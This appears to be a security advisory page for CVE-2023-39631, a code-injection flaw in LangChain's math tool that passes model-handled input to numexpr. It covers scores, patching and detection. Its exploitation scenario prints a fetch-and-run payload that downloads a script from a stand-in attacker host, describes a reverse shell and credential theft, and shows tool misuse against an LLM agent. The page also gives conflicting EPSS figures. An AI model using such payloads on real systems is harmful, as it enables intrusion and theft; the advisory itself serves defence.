CVE-2023-39631: LangChain RCE — CRITICAL

Q: Is CVE-2023-39631 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-39631, increasing the risk of exploitation.

Q: How to fix CVE-2023-39631?

1. PATCH: Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments including containerized and serverless deployments with pinned dependencies. 2. INVENTORY: Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments. 3. WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions. 4. DETECT: Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs. 5. VERIFY: Post-patch, confirm resolved version with `pip show langchain numexpr` and validate no transitive reinstallation of vulnerable versions via dependency resolution.

Q: What systems are affected by CVE-2023-39631?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM application pipelines, math and calculation tool chains, RAG pipelines with calculation tools, model serving with LangChain middleware.

Q: What is the CVSS score for CVE-2023-39631?

CVE-2023-39631 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.32%.

CISO Take

Any LangChain deployment below v0.0.308 using math-capable tools is exposed to unauthenticated remote code execution — no credentials, no user interaction required. Patch immediately: upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5. If patching is not immediate, disable all LangChain tools that invoke numexpr evaluation (e.g., LLMMathChain) and block internet exposure of affected endpoints.

What is the risk?

Critical. CVSS 9.8 with network-accessible attack vector, low complexity, and zero privilege requirements makes this trivially exploitable by any unauthenticated attacker. LangChain is among the most widely deployed AI frameworks in production, meaning blast radius is exceptionally high. The EPSS of 3.3% understates real-world risk given public PoC availability at time of disclosure. Organizations running LangChain-powered chatbots, agents, or APIs with math tools exposed are effectively offering unauthenticated shell access.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
LangChain	pip	—	No patch
139.8K OpenSSF 5.9 2.7K dependents Pushed 3d ago 24% patched ~156d to patch Full package profile →
LangChain	pip	< 0.0.308	`0.0.308`
139.8K OpenSSF 5.9 2.7K dependents Pushed 3d ago 24% patched ~156d to patch Full package profile →
numexpr	pip	< 2.8.5	`2.8.5`

How severe is it?

CVSS 3.1

9.8 / 10

EPSS

1.3%

chance of exploitation in 30 days

Higher than 67% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

What should I do?

5 steps

PATCH

Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments including containerized and serverless deployments with pinned dependencies.
INVENTORY

Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments.
WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions.
DETECT

Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs.
VERIFY

Post-patch, confirm resolved version with pip show langchain numexpr and validate no transitive reinstallation of vulnerable versions via dependency resolution.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework Agent Plugin AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.2 - AI-related processes for suppliers and partners

NIST AI RMF

MANAGE 2.2 - Manage AI risks from dependencies and supply chain

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-39631?

Any LangChain deployment below v0.0.308 using math-capable tools is exposed to unauthenticated remote code execution — no credentials, no user interaction required. Patch immediately: upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5. If patching is not immediate, disable all LangChain tools that invoke numexpr evaluation (e.g., LLMMathChain) and block internet exposure of affected endpoints.

Is CVE-2023-39631 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-39631, increasing the risk of exploitation.

How to fix CVE-2023-39631?

1. PATCH: Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments including containerized and serverless deployments with pinned dependencies. 2. INVENTORY: Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments. 3. WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions. 4. DETECT: Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs. 5. VERIFY: Post-patch, confirm resolved version with `pip show langchain numexpr` and validate no transitive reinstallation of vulnerable versions via dependency resolution.

What systems are affected by CVE-2023-39631?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM application pipelines, math and calculation tool chains, RAG pipelines with calculation tools, model serving with LangChain middleware.

What is the CVSS score for CVE-2023-39631?

CVE-2023-39631 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.32%.

What is the AI security impact?

Affected AI Architectures

agent frameworksLLM application pipelinesmath and calculation tool chainsRAG pipelines with calculation toolsmodel serving with LangChain middleware

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 15

ISO 42001: A.9.2

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

An issue in LanChain-ai Langchain v.0.0.245 allows a remote attacker to execute arbitrary code via the evaluate function in the numexpr library.

Exploitation Scenario

An adversary targets a publicly accessible LangChain-powered API or chatbot that offers calculation capabilities via LLMMathChain. The attacker submits a crafted mathematical expression as input — e.g., `__import__('os').system('curl attacker.com/shell.sh|bash')` — which LangChain forwards unsanitized to numexpr.evaluate(). numexpr interprets this as a valid Python expression and executes it with the application server's privileges. The attacker establishes a reverse shell (AML.T0072), exfiltrates stored API keys, model configs, and RAG database credentials, then pivots laterally to internal model registries or vector databases. No authentication is required at any stage.

Weaknesses (CWE)

CWE-94 Improper Control of Generation of Code ('Code Injection') Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

[Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
[Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.